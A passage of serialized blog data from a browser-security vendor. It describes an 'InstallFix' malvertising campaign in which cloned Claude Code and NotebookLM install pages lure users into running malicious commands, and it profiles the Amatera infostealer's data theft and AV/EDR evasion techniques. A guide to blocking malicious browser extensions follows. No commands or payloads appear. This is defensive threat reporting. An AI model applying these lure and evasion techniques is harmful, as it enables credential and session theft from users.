6},{},{"nodeType":178,"data":22604,"content":22605},{},[22606,22609],{"nodeType":173,"value":13836,"marks":22607,"data":22608},[],{},{"nodeType":173,"value":13945,"marks":22610,"data":22612},[22611],{"type":370},{},{"nodeType":178,"data":22614,"content":22615},{},[22616],{"nodeType":173,"value":13895,"marks":22617,"data":22619},[22618],{"type":13816},{},{"nodeType":178,"data":22621,"content":22622},{},[22623],{"nodeType":173,"value":13960,"marks":22624,"data":22626},[22625],{"type":13816},{},{"entries":22628},{"hyperlink":22629,"inline":22630,"block":22631},[],[],[22632,22651,22685,22689,22695,22700,22705,22711,22719,22761,22764,22785,22827],{"sys":22633,"__typename":5311,"content":22634,"name":22650,"title":118},{"id":12971},{"json":22635},{"nodeType":165,"data":22636,"content":22637},{},[22638],{"nodeType":178,"data":22639,"content":22640},{},[22641,22646],{"nodeType":173,"value":22642,"marks":22643,"data":22645},"Update March 16:",[22644],{"type":370},{},{"nodeType":173,"value":22647,"marks":22648,"data":22649}," We've identified a number of additional InstallFix pages targeting both the Claude Code docs page (as opposed to the quickstart guide) and NotebookLM, a research and note taking tool from Google. New IoCs have been added accordingly, but this campaign is moving very quickly, so the list won't stay up to date for long. ",[],{},"installfix insight box 5",{"sys":22652,"__typename":5311,"content":22653,"name":22684,"title":118},{"id":13015},{"json":22654},{"data":22655,"content":22656,"nodeType":165},{},[22657,22677],{"data":22658,"content":22659,"nodeType":178},{},[22660,22664,22673],{"data":22661,"marks":22662,"value":22663,"nodeType":173},{},[],"Feeling *Fix fatigue? Us too. But we felt the naming appropriate to indicate that this is part of the same family of techniques. ClickFix has become synonymous with ",{"data":22665,"content":22667,"nodeType":186},{"uri":22666},"https://attack.mitre.org/techniques/T1204/004/",[22668],{"data":22669,"marks":22670,"value":22672,"nodeType":173},{},[22671],{"type":194},"Malicious Copy and Paste",{"data":22674,"marks":22675,"value":22676,"nodeType":173},{},[],", even though most lures haven’t been related to “fixing” anything for a while now. The user action is essentially the same, just the context of the lure is different. ",{"data":22678,"content":22679,"nodeType":178},{},[22680],{"data":22681,"marks":22682,"value":22683,"nodeType":173},{},[],"But while traditional ClickFix attacks need to manufacture a reason for the user to run a command: a fake CAPTCHA, a fabricated error message, a bogus system prompt — InstallFix doesn't need any of that. The pretext is simply the user wanting to install legit software.","installfix insight box 3",{"sys":22686,"__typename":5434,"title":22687,"arcadeDemoUrl":22688,"playText":11935},{"id":13088},"InstallFix clickthrough demo","https://demo.arcade.software/w9lLXrpwl5E19eQMEcPb?embed",{"sys":22690,"__typename":5345,"title":22691,"caption":22691,"layoutMode":118,"file":22692},{"id":13094},"Comparison of the legit page and install commands versus a malicious clone",{"url":22693,"width":5358,"height":22694},"https://images.ctfassets.net/y1cdw1ablpvd/27TYctONO1xi4dAh0lBeYS/36d88361bbb6568410af6d95b829b4d8/image4.png",588,{"sys":22696,"__typename":5345,"title":22697,"caption":22697,"layoutMode":118,"file":22698},{"id":13107},"When interacting with some of the detected pages, the user is redirected back to the legitimate site, lowering suspicion",{"url":22699,"width":5399,"height":5400},"https://images.ctfassets.net/y1cdw1ablpvd/17m5qsbzkBXFHumXDG8Kur/50d42f3c42092cba3082c4221a0857b0/image1.gif",{"sys":22701,"__typename":5345,"title":22702,"caption":118,"layoutMode":118,"file":22703},{"id":13127},"Cloned page 1",{"url":22704,"width":5358,"height":11979},"https://images.ctfassets.net/y1cdw1ablpvd/3ymf2ZJNmWE0U09oOQktzj/74984e9a094f01df4bcb661e23d58992/image2.png",{"sys":22706,"__typename":5345,"title":22707,"caption":118,"layoutMode":118,"file":22708},{"id":13133},"Cloned page lure 2",{"url":22709,"width":5358,"height":22710},"https://images.ctfassets.net/y1cdw1ablpvd/YbK5GVyftUS5G09jmdxSG/cc4c2cca40f873879d69371eab526b56/image3.png",1107,{"sys":22712,"__typename":5345,"title":22713,"caption":22714,"layoutMode":118,"file":22715},{"id":13139},"Lure 3","Google Search sponsored results for Claude Code cloned pages",{"url":22716,"width":22717,"height":22718},"https://images.ctfassets.net/y1cdw1ablpvd/3sLwOnpET892xdFyvBtzfn/956963620a9cec4bafd3b3a63f0426b0/image5.png",1915,903,{"sys":22720,"__typename":5311,"content":22721,"name":22760,"title":118},{"id":13145},{"json":22722},{"nodeType":165,"data":22723,"content":22724},{},[22725],{"nodeType":178,"data":22726,"content":22727},{},[22728,22732,22740,22744,22751,22755],{"nodeType":173,"value":22729,"marks":22730,"data":22731},"Malvertising is an extremely prevalent distribution method ",[],{},{"nodeType":186,"data":22733,"content":22734},{"uri":15196},[22735],{"nodeType":173,"value":22736,"marks":22737,"data":22739},"we've seen used extensively",[22738],{"type":194},{},{"nodeType":173,"value":22741,"marks":22742,"data":22743}," to distribute both phishing payloads and ClickFix-style lures (including the ",[],{},{"nodeType":186,"data":22745,"content":22746},{"uri":1854},[22747],{"nodeType":173,"value":1857,"marks":22748,"data":22750},[22749],{"type":194},{},{"nodeType":173,"value":22752,"marks":22753,"data":22754}," campaign we uncovered last year). ",[],{},{"nodeType":173,"value":22756,"marks":22757,"data":22759},"In fact, 4 in 5 ClickFix lures we intercept are accessed from search engines.",[22758],{"type":370},{},"installfix insight box 1",{"sys":22762,"__typename":15269,"type":15270,"ctaText":22763,"buttonLabel":87,"buttonColour":15273,"buttonUrl":66},{"id":13190},"Read more about stealthy attack delivery and techniques in our new report, analysing the different browser-based techniques behind in-the-wild breaches in 2026.",{"sys":22765,"__typename":5311,"content":22766,"name":22784,"title":118},{"id":13265},{"json":22767},{"nodeType":165,"data":22768,"content":22769},{},[22770,22777],{"nodeType":178,"data":22771,"content":22772},{},[22773],{"nodeType":173,"value":22774,"marks":22775,"data":22776},"Amatera is a relatively new infostealer used by cybercriminals to steal sensitive data, such as browser saved passwords, cookies, session tokens, and general system information. It started appearing publicly around 2025 and is considered an evolution of an older malware family called ACR Stealer, and is sold via subscription to criminal operators.",[],{},{"nodeType":178,"data":22778,"content":22779},{},[22780],{"nodeType":173,"value":22781,"marks":22782,"data":22783},"The malware uses various techniques designed to bypass AV/EDR, including direct NTSockets for C2, dynamic API resolution with WoW64 Syscalls, and multi-stage infection chains with dynamic payload delivery. Amatera communicates with its C2 server using hardcoded IP addresses belonging to legitimate CDNs, making the traffic difficult to block without disrupting legitimate services.",[],{},"installfix insight box 2",{"sys":22786,"__typename":5311,"content":22787,"name":22826,"title":118},{"id":13278},{"json":22788},{"nodeType":165,"data":22789,"content":22790},{},[22791],{"nodeType":178,"data":22792,"content":22793},{},[22794,22799,22803,22811,22814,22822],{"nodeType":173,"value":22795,"marks":22796,"data":22798},"Edit: ",[22797],{"type":370},{},{"nodeType":173,"value":22800,"marks":22801,"data":22802},"When investigating different domains, we found additional research that indicates a variety of similar payloads being distributed. Our primary focus here is on the scale of the campaign and the lure delivery technique rather than deep analysis of the malware itself. Check out ",[],{},{"nodeType":186,"data":22804,"content":22806},{"uri":22805},"https://medium.com/@maurice.fielenbach/paste-with-caution-how-a-fake-claude-code-installer-drops-a-fileless-implant-via-deserialization-a85068955c0a",[22807],{"nodeType":173,"value":22808,"marks":22809,"data":22810},"this detailed analysis for one such teardown",[],{},{"nodeType":173,"value":9534,"marks":22812,"data":22813},[],{},{"nodeType":186,"data":22815,"content":22817},{"uri":22816},"https://www.reddit.com/r/CyberSecurityAdvice/comments/1riq3zj/i_accidentally_ran_a_suspicious_curl_command_in/",[22818],{"nodeType":173,"value":22819,"marks":22820,"data":22821},"this Reddit thread",[],{},{"nodeType":173,"value":22823,"marks":22824,"data":22825}," for another example.",[],{},"installfix insight box 4",{"sys":22828,"__typename":5434,"title":22829,"arcadeDemoUrl":22830,"playText":5437},{"id":13436},"ClickFix attack evolution demo","https://demo.arcade.software/UhbkGxUUQC8xpS5z88sx?embed","content:blog:installfix.json","blog/installfix.json","blog/installfix",{"_path":22835,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":22836,"ogImage":118,"summary":22838,"title":3962,"subtitle":118,"metaTitle":3962,"synopsis":3963,"hashTags":118,"publishedDate":3964,"slug":3965,"tagsCollection":22849,"authorsCollection":22855,"content":22859,"relatedBlogPostsCollection":23900,"_id":26100,"_type":5439,"_source":5440,"_file":26101,"_stem":26102,"_extension":5439},"/blog/browser-extension-management-guide",{"id":2914,"publishedAt":22837},"2026-03-05T09:35:38.620Z",{"json":22839},{"data":22840,"content":22841,"nodeType":165},{},[22842],{"data":22843,"content":22844,"nodeType":178},{},[22845],{"data":22846,"marks":22847,"value":22848,"nodeType":173},{},[],"Detect risky and malicious extensions and block them from running in employee browsers using Push.",{"items":22850},[22851,22853],{"sys":22852,"name":505},{"id":504},{"sys":22854,"name":509},{"id":508},{"items":22856},[22857],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":22858},{"url":1496},{"json":22860,"links":23769},{"nodeType":165,"data":22861,"content":22862},{},[22863,22919,22925,22930,22933,22940,22946,22952,22959,22965,23014,23028,23034,23040,23043,23050,23056,23111,23118,23124,23129,23134,23140,23146,23161,23167,23209,23214,23221,23238,23244,23250,23334,23340,23353,23358,23365,23371,23377,23383,23436,23441,23446,23453,23459,23465,23486,23492,23497,23516,23521,23527,23534,23540,23546,23576,23592,23598,23608,23611,23618,23624,23629,23632,23639,23646,23652,23668,23674,23680,23685,23691,23697,23702,23705,23712,23727,23733],{"nodeType":178,"data":22864,"content":22865},{},[22866,22869,22876,22879,22886,22889,22896,22899,22906,22909,22916],{"nodeType":173,"value":2923,"marks":22867,"data":22868},[],{},{"nodeType":186,"data":22870,"content":22871},{"uri":2928},[22872],{"nodeType":173,"value":2931,"marks":22873,"data":22875},[22874],{"type":194},{},{"nodeType":173,"value":2936,"marks":22877,"data":22878},[],{},{"nodeType":186,"data":22880,"content":22881},{"uri":2941},[22882],{"nodeType":173,"value":2944,"marks":22883,"data":22885},[22884],{"type":194},{},{"nodeType":173,"value":2936,"marks":22887,"data":22888},[],{},{"nodeType":186,"data":22890,"content":22891},{"uri":2953},[22892],{"nodeType":173,"value":2956,"marks":22893,"data":22895},[22894],{"type":194},{},{"nodeType":173,"value":2961,"marks":22897,"data":22898},[],{},{"nodeType":186,"data":22900,"content":22901},{"uri":2966},[22902],{"nodeType":173,"value":2969,"marks":22903,"data":22905},[22904],{"type":194},{},{"nodeType":173,"value":933,"marks":22907,"data":22908},[],{},{"nodeType":186,"data":22910,"content":22911},{"uri":2978},[22912],{"nodeType":173,"value":2981,"marks":22913,"data":22915},[22914],{"type":194},{},{"nodeType":173,"value":2986,"marks":22917,"data":22918},[],{},{"nodeType":178,"data":22920,"content":22921},{},[22922],{"nodeType":173,"value":2993,"marks":22923,"data":22924},[],{},{"nodeType":312,"data":22926,"content":22929},{"target":22927},{"sys":22928},{"id":3000,"type":317,"linkType":318},[],{"nodeType":231,"data":22931,"content":22932},{},[],{"nodeType":169,"data":22934,"content":22935},{},[22936],{"nodeType":173,"value":3009,"marks":22937,"data":22939},[22938],{"type":370},{},{"nodeType":178,"data":22941,"content":22942},{},[22943],{"nodeType":173,"value":3017,"marks":22944,"data":22945},[],{},{"nodeType":178,"data":22947,"content":22948},{},[22949],{"nodeType":173,"value":3024,"marks":22950,"data":22951},[],{},{"nodeType":235,"data":22953,"content":22954},{},[22955],{"nodeType":173,"value":3031,"marks":22956,"data":22958},[22957],{"type":370},{},{"nodeType":178,"data":22960,"content":22961},{},[22962],{"nodeType":173,"value":3039,"marks":22963,"data":22964},[],{},{"nodeType":250,"data":22966,"content":22967},{},[22968,22987,22996,23005],{"nodeType":254,"data":22969,"content":22970},{},[22971],{"nodeType":178,"data":22972,"content":22973},{},[22974,22977,22984],{"nodeType":173,"value":3052,"marks":22975,"data":22976},[],{},{"nodeType":186,"data":22978,"content":22979},{"uri":3057},[22980],{"nodeType":173,"value":3060,"marks":22981,"data":22983},[22982],{"type":194},{},{"nodeType":173,"value":3065,"marks":22985,"data":22986},[],{},{"nodeType":254,"data":22988,"content":22989},{},[22990],{"nodeType":178,"data":22991,"content":22992},{},[22993],{"nodeType":173,"value":3075,"marks":22994,"data":22995},[],{},{"nodeType":254,"data":22997,"content":22998},{},[22999],{"nodeType":178,"data":23000,"content":23001},{},[23002],{"nodeType":173,"value":3085,"marks":23003,"data":23004},[],{},{"nodeType":254,"data":23006,"content":23007},{},[23008],{"nodeType":178,"data":23009,"content":23010},{},[23011],{"nodeType":173,"value":3095,"marks":23012,"data":23013},[],{},{"nodeType":178,"data":23015,"content":23016},{},[23017,23021,23024],{"nodeType":173,"value":3102,"marks":23018,"data":23020},[23019],{"type":370},{},{"nodeType":173,"value":3107,"marks":23022,"data":23023},[],{},{"nodeType":173,"value":3111,"marks":23025,"data":23027},[23026],{"type":370},{},{"nodeType":178,"data":23029,"content":23030},{},[23031],{"nodeType":173,"value":3119,"marks":23032,"data":23033},[],{},{"nodeType":178,"data":23035,"content":23036},{},[23037],{"nodeType":173,"value":3126,"marks":23038,"data":23039},[],{},{"nodeType":231,"data":23041,"content":23042},{},[],{"nodeType":169,"data":23044,"content":23045},{},[23046],{"nodeType":173,"value":3136,"marks":23047,"data":23049},[23048],{"type":370},{},{"nodeType":178,"data":23051,"content":23052},{},[23053],{"nodeType":173,"value":3144,"marks":23054,"data":23055},[],{},{"nodeType":250,"data":23057,"content":23058},{},[23059,23075,23084,23093,23102],{"nodeType":254,"data":23060,"content":23061},{},[23062],{"nodeType":178,"data":23063,"content":23064},{},[23065,23068,23072],{"nodeType":173,"value":3157,"marks":23066,"data":23067},[],{},{"nodeType":173,"value":3161,"marks":23069,"data":23071},[23070],{"type":370},{},{"nodeType":173,"value":3166,"marks":23073,"data":23074},[],{},{"nodeType":254,"data":23076,"content":23077},{},[23078],{"nodeType":178,"data":23079,"content":23080},{},[23081],{"nodeType":173,"value":3176,"marks":23082,"data":23083},[],{},{"nodeType":254,"data":23085,"content":23086},{},[23087],{"nodeType":178,"data":23088,"content":23089},{},[23090],{"nodeType":173,"value":3186,"marks":23091,"data":23092},[],{},{"nodeType":254,"data":23094,"content":23095},{},[23096],{"nodeType":178,"data":23097,"content":23098},{},[23099],{"nodeType":173,"value":3196,"marks":23100,"data":23101},[],{},{"nodeType":254,"data":23103,"content":23104},{},[23105],{"nodeType":178,"data":23106,"content":23107},{},[23108],{"nodeType":173,"value":3206,"marks":23109,"data":23110},[],{},{"nodeType":235,"data":23112,"content":23113},{},[23114],{"nodeType":173,"value":3213,"marks":23115,"data":23117},[23116],{"type":370},{},{"nodeType":178,"data":23119,"content":23120},{},[23121],{"nodeType":173,"value":3221,"marks":23122,"data":23123},[],{},{"nodeType":312,"data":23125,"content":23128},{"target":23126},{"sys":23127},{"id":3228,"type":317,"linkType":318},[],{"nodeType":312,"data":23130,"content":23133},{"target":23131},{"sys":23132},{"id":3234,"type":317,"linkType":318},[],{"nodeType":178,"data":23135,"content":23136},{},[23137],{"nodeType":173,"value":3240,"marks":23138,"data":23139},[],{},{"nodeType":178,"data":23141,"content":23142},{},[23143],{"nodeType":173,"value":3247,"marks":23144,"data":23145},[],{},{"nodeType":178,"data":23147,"content":23148},{},[23149,23152,23158],{"nodeType":173,"value":3254,"marks":23150,"data":23151},[],{},{"nodeType":186,"data":23153,"content":23154},{"uri":3259},[23155],{"nodeType":173,"value":3262,"marks":23156,"data":23157},[],{},{"nodeType":173,"value":2340,"marks":23159,"data":23160},[],{},{"nodeType":178,"data":23162,"content":23163},{},[23164],{"nodeType":173,"value":3272,"marks":23165,"data":23166},[],{},{"nodeType":250,"data":23168,"content":23169},{},[23170,23183,23196],{"nodeType":254,"data":23171,"content":23172},{},[23173],{"nodeType":178,"data":23174,"content":23175},{},[23176,23180],{"nodeType":173,"value":3285,"marks":23177,"data":23179},[23178],{"type":370},{},{"nodeType":173,"value":3290,"marks":23181,"data":23182},[],{},{"nodeType":254,"data":23184,"content":23185},{},[23186],{"nodeType":178,"data":23187,"content":23188},{},[23189,23193],{"nodeType":173,"value":3300,"marks":23190,"data":23192},[23191],{"type":370},{},{"nodeType":173,"value":3305,"marks":23194,"data":23195},[],{},{"nodeType":254,"data":23197,"content":23198},{},[23199],{"nodeType":178,"data":23200,"content":23201},{},[23202,23206],{"nodeType":173,"value":3315,"marks":23203,"data":23205},[23204],{"type":370},{},{"nodeType":173,"value":3320,"marks":23207,"data":23208},[],{},{"nodeType":312,"data":23210,"content":23213},{"target":23211},{"sys":23212},{"id":3327,"type":317,"linkType":318},[],{"nodeType":235,"data":23215,"content":23216},{},[23217],{"nodeType":173,"value":3333,"marks":23218,"data":23220},[23219],{"type":370},{},{"nodeType":178,"data":23222,"content":23223},{},[23224,23227,23231,23234],{"nodeType":173,"value":3341,"marks":23225,"data":23226},[],{},{"nodeType":173,"value":3345,"marks":23228,"data":23230},[23229],{"type":370},{},{"nodeType":173,"value":3350,"marks":23232,"data":23233},[],{},{"nodeType":173,"value":3354,"marks":23235,"data":23237},[23236],{"type":370},{},{"nodeType":178,"data":23239,"content":23240},{},[23241],{"nodeType":173,"value":3362,"marks":23242,"data":23243},[],{},{"nodeType":178,"data":23245,"content":23246},{},[23247],{"nodeType":173,"value":3369,"marks":23248,"data":23249},[],{},{"nodeType":250,"data":23251,"content":23252},{},[23253,23262,23271,23280,23289,23298,23307,23316,23325],{"nodeType":254,"data":23254,"content":23255},{},[23256],{"nodeType":178,"data":23257,"content":23258},{},[23259],{"nodeType":173,"value":3382,"marks":23260,"data":23261},[],{},{"nodeType":254,"data":23263,"content":23264},{},[23265],{"nodeType":178,"data":23266,"content":23267},{},[23268],{"nodeType":173,"value":3392,"marks":23269,"data":23270},[],{},{"nodeType":254,"data":23272,"content":23273},{},[23274],{"nodeType":178,"data":23275,"content":23276},{},[23277],{"nodeType":173,"value":3402,"marks":23278,"data":23279},[],{},{"nodeType":254,"data":23281,"content":23282},{},[23283],{"nodeType":178,"data":23284,"content":23285},{},[23286],{"nodeType":173,"value":3412,"marks":23287,"data":23288},[],{},{"nodeType":254,"data":23290,"content":23291},{},[23292],{"nodeType":178,"data":23293,"content":23294},{},[23295],{"nodeType":173,"value":3422,"marks":23296,"data":23297},[],{},{"nodeType":254,"data":23299,"content":23300},{},[23301],{"nodeType":178,"data":23302,"content":23303},{},[23304],{"nodeType":173,"value":3432,"marks":23305,"data":23306},[],{},{"nodeType":254,"data":23308,"content":23309},{},[23310],{"nodeType":178,"data":23311,"content":23312},{},[23313],{"nodeType":173,"value":3442,"marks":23314,"data":23315},[],{},{"nodeType":254,"data":23317,"content":23318},{},[23319],{"nodeType":178,"data":23320,"content":23321},{},[23322],{"nodeType":173,"value":3452,"marks":23323,"data":23324},[],{},{"nodeType":254,"data":23326,"content":23327},{},[23328],{"nodeType":178,"data":23329,"content":23330},{},[23331],{"nodeType":173,"value":3462,"marks":23332,"data":23333},[],{},{"nodeType":178,"data":23335,"content":23336},{},[23337],{"nodeType":173,"value":3469,"marks":23338,"data":23339},[],{},{"nodeType":178,"data":23341,"content":23342},{},[23343,23346,23350],{"nodeType":173,"value":3476,"marks":23344,"data":23345},[],{},{"nodeType":173,"value":3480,"marks":23347,"data":23349},[23348],{"type":370},{},{"nodeType":173,"value":3485,"marks":23351,"data":23352},[],{},{"nodeType":312,"data":23354,"content":23357},{"target":23355},{"sys":23356},{"id":3492,"type":317,"linkType":318},[],{"nodeType":235,"data":23359,"content":23360},{},[23361],{"nodeType":173,"value":3186,"marks":23362,"data":23364},[23363],{"type":370},{},{"nodeType":178,"data":23366,"content":23367},{},[23368],{"nodeType":173,"value":3505,"marks":23369,"data":23370},[],{},{"nodeType":178,"data":23372,"content":23373},{},[23374],{"nodeType":173,"value":3512,"marks":23375,"data":23376},[],{},{"nodeType":178,"data":23378,"content":23379},{},[23380],{"nodeType":173,"value":3519,"marks":23381,"data":23382},[],{},{"nodeType":250,"data":23384,"content":23385},{},[23386,23395,23418,23427],{"nodeType":254,"data":23387,"content":23388},{},[23389],{"nodeType":178,"data":23390,"content":23391},{},[23392],{"nodeType":173,"value":3532,"marks":23393,"data":23394},[],{},{"nodeType":254,"data":23396,"content":23397},{},[23398],{"nodeType":178,"data":23399,"content":23400},{},[23401,23404,23408,23411,23415],{"nodeType":173,"value":3542,"marks":23402,"data":23403},[],{},{"nodeType":173,"value":3546,"marks":23405,"data":23407},[23406],{"type":370},{},{"nodeType":173,"value":3551,"marks":23409,"data":23410},[],{},{"nodeType":173,"value":3555,"marks":23412,"data":23414},[23413],{"type":370},{},{"nodeType":173,"value":3560,"marks":23416,"data":23417},[],{},{"nodeType":254,"data":23419,"content":23420},{},[23421],{"nodeType":178,"data":23422,"content":23423},{},[23424],{"nodeType":173,"value":3570,"marks":23425,"data":23426},[],{},{"nodeType":254,"data":23428,"content":23429},{},[23430],{"nodeType":178,"data":23431,"content":23432},{},[23433],{"nodeType":173,"value":3580,"marks":23434,"data":23435},[],{},{"nodeType":312,"data":23437,"content":23440},{"target":23438},{"sys":23439},{"id":3587,"type":317,"linkType":318},[],{"nodeType":312,"data":23442,"content":23445},{"target":23443},{"sys":23444},{"id":3593,"type":317,"linkType":318},[],{"nodeType":235,"data":23447,"content":23448},{},[23449],{"nodeType":173,"value":3599,"marks":23450,"data":23452},[23451],{"type":370},{},{"nodeType":178,"data":23454,"content":23455},{},[23456],{"nodeType":173,"value":3607,"marks":23457,"data":23458},[],{},{"nodeType":178,"data":23460,"content":23461},{},[23462],{"nodeType":173,"value":3614,"marks":23463,"data":23464},[],{},{"nodeType":250,"data":23466,"content":23467},{},[23468,23477],{"nodeType":254,"data":23469,"content":23470},{},[23471],{"nodeType":178,"data":23472,"content":23473},{},[23474],{"nodeType":173,"value":3627,"marks":23475,"data":23476},[],{},{"nodeType":254,"data":23478,"content":23479},{},[23480],{"nodeType":178,"data":23481,"content":23482},{},[23483],{"nodeType":173,"value":3637,"marks":23484,"data":23485},[],{},{"nodeType":178,"data":23487,"content":23488},{},[23489],{"nodeType":173,"value":3644,"marks":23490,"data":23491},[],{},{"nodeType":312,"data":23493,"content":23496},{"target":23494},{"sys":23495},{"id":3651,"type":317,"linkType":318},[],{"nodeType":178,"data":23498,"content":23499},{},[23500,23504,23512],{"nodeType":173,"value":3657,"marks":23501,"data":23503},[23502],{"type":370},{},{"nodeType":186,"data":23505,"content":23506},{"uri":3663},[23507],{"nodeType":173,"value":3666,"marks":23508,"data":23511},[23509,23510],{"type":194},{"type":370},{},{"nodeType":173,"value":197,"marks":23513,"data":23515},[23514],{"type":370},{},{"nodeType":312,"data":23517,"content":23520},{"target":23518},{"sys":23519},{"id":3679,"type":317,"linkType":318},[],{"nodeType":178,"data":23522,"content":23523},{},[23524],{"nodeType":173,"value":3685,"marks":23525,"data":23526},[],{},{"nodeType":235,"data":23528,"content":23529},{},[23530],{"nodeType":173,"value":3206,"marks":23531,"data":23533},[23532],{"type":370},{},{"nodeType":178,"data":23535,"content":23536},{},[23537],{"nodeType":173,"value":3699,"marks":23538,"data":23539},[],{},{"nodeType":178,"data":23541,"content":23542},{},[23543],{"nodeType":173,"value":3706,"marks":23544,"data":23545},[],{},{"nodeType":250,"data":23547,"content":23548},{},[23549,23558,23567],{"nodeType":254,"data":23550,"content":23551},{},[23552],{"nodeType":178,"data":23553,"content":23554},{},[23555],{"nodeType":173,"value":3719,"marks":23556,"data":23557},[],{},{"nodeType":254,"data":23559,"content":23560},{},[23561],{"nodeType":178,"data":23562,"content":23563},{},[23564],{"nodeType":173,"value":3729,"marks":23565,"data":23566},[],{},{"nodeType":254,"data":23568,"content":23569},{},[23570],{"nodeType":178,"data":23571,"content":23572},{},[23573],{"nodeType":173,"value":3739,"marks":23574,"data":23575},[],{},{"nodeType":178,"data":23577,"content":23578},{},[23579,23582,23589],{"nodeType":173,"value":3746,"marks":23580,"data":23581},[],{},{"nodeType":186,"data":23583,"content":23584},{"uri":3751},[23585],{"nodeType":173,"value":3754,"marks":23586,"data":23588},[23587],{"type":194},{},{"nodeType":173,"value":37,"marks":23590,"data":23591},[],{},{"nodeType":178,"data":23593,"content":23594},{},[23595],{"nodeType":173,"value":3765,"marks":23596,"data":23597},[],{},{"nodeType":3769,"data":23599,"content":23600},{},[23601],{"nodeType":178,"data":23602,"content":23603},{},[23604],{"nodeType":173,"value":3776,"marks":23605,"data":23607},[23606],{"type":370},{},{"nodeType":231,"data":23609,"content":23610},{},[],{"nodeType":235,"data":23612,"content":23613},{},[23614],{"nodeType":173,"value":3787,"marks":23615,"data":23617},[23616],{"type":370},{},{"nodeType":178,"data":23619,"content":23620},{},[23621],{"nodeType":173,"value":3795,"marks":23622,"data":23623},[],{},{"nodeType":312,"data":23625,"content":23628},{"target":23626},{"sys":23627},{"id":3802,"type":317,"linkType":318},[],{"nodeType":231,"data":23630,"content":23631},{},[],{"nodeType":169,"data":23633,"content":23634},{},[23635],{"nodeType":173,"value":3811,"marks":23636,"data":23638},[23637],{"type":370},{},{"nodeType":235,"data":23640,"content":23641},{},[23642],{"nodeType":173,"value":3819,"marks":23643,"data":23645},[23644],{"type":370},{},{"nodeType":178,"data":23647,"content":23648},{},[23649],{"nodeType":173,"value":3827,"marks":23650,"data":23651},[],{},{"nodeType":178,"data":23653,"content":23654},{},[23655,23658,23665],{"nodeType":173,"value":3834,"marks":23656,"data":23657},[],{},{"nodeType":186,"data":23659,"content":23660},{"uri":3839},[23661],{"nodeType":173,"value":3842,"marks":23662,"data":23664},[23663],{"type":194},{},{"nodeType":173,"value":1477,"marks":23666,"data":23667},[],{},{"nodeType":178,"data":23669,"content":23670},{},[23671],{"nodeType":173,"value":3853,"marks":23672,"data":23673},[],{},{"nodeType":178,"data":23675,"content":23676},{},[23677],{"nodeType":173,"value":3860,"marks":23678,"data":23679},[],{},{"nodeType":312,"data":23681,"content":23684},{"target":23682},{"sys":23683},{"id":3867,"type":317,"linkType":318},[],{"nodeType":178,"data":23686,"content":23687},{},[23688],{"nodeType":173,"value":3873,"marks":23689,"data":23690},[],{},{"nodeType":178,"data":23692,"content":23693},{},[23694],{"nodeType":173,"value":3880,"marks":23695,"data":23696},[],{},{"nodeType":312,"data":23698,"content":23701},{"target":23699},{"sys":23700},{"id":3887,"type":317,"linkType":318},[],{"nodeType":231,"data":23703,"content":23704},{},[],{"nodeType":169,"data":23706,"content":23707},{},[23708],{"nodeType":173,"value":2824,"marks":23709,"data":23711},[23710],{"type":370},{},{"nodeType":178,"data":23713,"content":23714},{},[23715,23718,23724],{"nodeType":173,"value":2832,"marks":23716,"data":23717},[],{},{"nodeType":186,"data":23719,"content":23720},{"uri":66},[23721],{"nodeType":173,"value":3909,"marks":23722,"data":23723},[],{},{"nodeType":173,"value":1477,"marks":23725,"data":23726},[],{},{"nodeType":178,"data":23728,"content":23729},{},[23730],{"nodeType":173,"value":2850,"marks":23731,"data":23732},[],{},{"nodeType":178,"data":23734,"content":23735},{},[23736,23739,23746,23749,23756,23759,23766],{"nodeType":173,"value":3925,"marks":23737,"data":23738},[],{},{"nodeType":186,"data":23740,"content":23741},{"uri":1456},[23742],{"nodeType":173,"value":3932,"marks":23743,"data":23745},[23744],{"type":194},{},{"nodeType":173,"value":2936,"marks":23747,"data":23748},[],{},{"nodeType":186,"data":23750,"content":23751},{"uri":3941},[23752],{"nodeType":173,"value":3944,"marks":23753,"data":23755},[23754],{"type":194},{},{"nodeType":173,"value":3949,"marks":23757,"data":23758},[],{},{"nodeType":186,"data":23760,"content":23761},{"uri":1469},[23762],{"nodeType":173,"value":1472,"marks":23763,"data":23765},[23764],{"type":194},{},{"nodeType":173,"value":1477,"marks":23767,"data":23768},[],{},{"entries":23770},{"hyperlink":23771,"inline":23772,"block":23773},[],[],[23774,23810,23815,23829,23837,23841,23846,23860,23874,23882,23888,23895],{"sys":23775,"__typename":5311,"content":23776,"name":23809,"title":118},{"id":3000},{"json":23777},{"data":23778,"content":23779,"nodeType":165},{},[23780,23787],{"data":23781,"content":23782,"nodeType":178},{},[23783],{"data":23784,"marks":23785,"value":23786,"nodeType":173},{},[],"Imagine the scenario. There’s a small dev team responsible for a basic but widely used extension (let’s say a color picker tool) with millions of users. An attacker just needs to phish a dev (that might not even be working from a device with proper security software or controls), grab the extension code that is publicly available from the store, insert obfuscated malicious code, and upload the new version to the store. As soon as the extension updates, millions of browsers are compromised. ",{"data":23788,"content":23789,"nodeType":178},{},[23790,23795,23805],{"data":23791,"marks":23792,"value":23794,"nodeType":173},{},[23793],{"type":370},"This is why we take our own security processes around extension management so seriously. ",{"data":23796,"content":23798,"nodeType":186},{"uri":23797},"https://pushsecurity.com/blog/guide-to-secure-browser-extension-deployment/",[23799],{"data":23800,"marks":23801,"value":23804,"nodeType":173},{},[23802,23803],{"type":194},{"type":370},"You can find out more about our process here",{"data":23806,"marks":23807,"value":2340,"nodeType":173},{},[23808],{"type":370},"Managing Extensions Guide: IB1",{"sys":23811,"__typename":5345,"title":23812,"caption":23812,"layoutMode":118,"file":23813},{"id":3228},"Enabling the malicious extension detection feature in the Push platform",{"url":23814,"width":19653,"height":19654},"https://images.ctfassets.net/y1cdw1ablpvd/5DUcgBc8Fcx825yar7LX67/f18970551bfb9d59f206add2af106b89/image6.png",{"sys":23816,"__typename":5311,"content":23817,"name":23828,"title":118},{"id":3234},{"json":23818},{"nodeType":165,"data":23819,"content":23820},{},[23821],{"nodeType":178,"data":23822,"content":23823},{},[23824],{"nodeType":173,"value":23825,"marks":23826,"data":23827},"Even if you’re blocking employees from installing extensions without admin approval, an extension that was safe and approved yesterday can be malicious today. This is why it’s vital that organizations proactively block known-bad extensions — particularly when extension stores cannot be relied upon to disable extensions already installed in your employee browsers. Early intervention can mean the difference between a malicious update being deployed and browser secrets being stolen, and disabling the extension before any harm is done. ",[],{},"Managing Extensions Guide: 